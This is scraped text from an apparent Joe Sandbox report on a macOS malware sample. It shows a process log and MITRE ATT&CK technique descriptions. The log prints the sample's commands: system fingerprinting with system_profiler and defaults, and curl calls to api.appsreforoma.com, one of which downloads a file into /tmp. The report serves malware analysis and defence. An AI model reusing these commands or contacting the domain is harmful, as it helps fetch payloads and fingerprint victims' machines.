Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/usr/bin/curl
Arguments:	curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0
File size:	185072 bytes
MD5 hash:	2418204e23e2952e7995f1819a1f78f5

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/usr/bin/defaults
Arguments:	defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
File size:	40000 bytes
MD5 hash:	fd63b6120ed5a062dbb6397bc9f8ffb8

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/usr/sbin/system_profiler
Arguments:	system_profiler SPHardwareDataType
File size:	45472 bytes
MD5 hash:	271feb2b4c0447da2b7ac523f13a4824

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/usr/sbin/system_profiler
Arguments:	-
File size:	45472 bytes
MD5 hash:	271feb2b4c0447da2b7ac523f13a4824

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/usr/bin/awk
Arguments:	awk /UUID/ { print $3 }
File size:	112576 bytes
MD5 hash:	c2a01c11db999f97496e09e12f468956

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/usr/bin/curl
Arguments:	curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1
File size:	185072 bytes
MD5 hash:	2418204e23e2952e7995f1819a1f78f5

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/usr/bin/curl
Arguments:	curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593
File size:	185072 bytes
MD5 hash:	2418204e23e2952e7995f1819a1f78f5

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:26
Start date (UTC):	19/04/2024
Path:	/usr/bin/curl
Arguments:	curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3
File size:	185072 bytes
MD5 hash:	2418204e23e2952e7995f1819a1f78f5

Start time (UTC):	09:46:06
Start date (UTC):	19/04/2024
Path:	/usr/libexec/xpcproxy
Arguments:	-
File size:	44048 bytes
MD5 hash:	4764d9eafe6b7dac23253a9f8b7f73d6

Start time (UTC):	09:46:06
Start date (UTC):	19/04/2024
Path:	/usr/libexec/firmwarecheckers/eficheck/eficheck
Arguments:	/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
File size:	74048 bytes
MD5 hash:	328beb81a2263449258057506bb4987f

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report malw_sampl

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/dev/null

Static File Info

General

CodeSign Information

Static Mach Info

General Information for header 1

Symbols

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTPS Connections

System Behavior

Analysis Process: xpcproxy PID: 611, Parent PID: 1

General

Chronological Activities

Analysis Process: nsurlstoraged PID: 611, Parent PID: 1

General

Chronological Activities

Analysis Process: mono-sgen32 PID: 620, Parent PID: 537

General

Chronological Activities

Analysis Process: malw_sampl PID: 620, Parent PID: 537

General

macOS Analysis Report
malw_sampl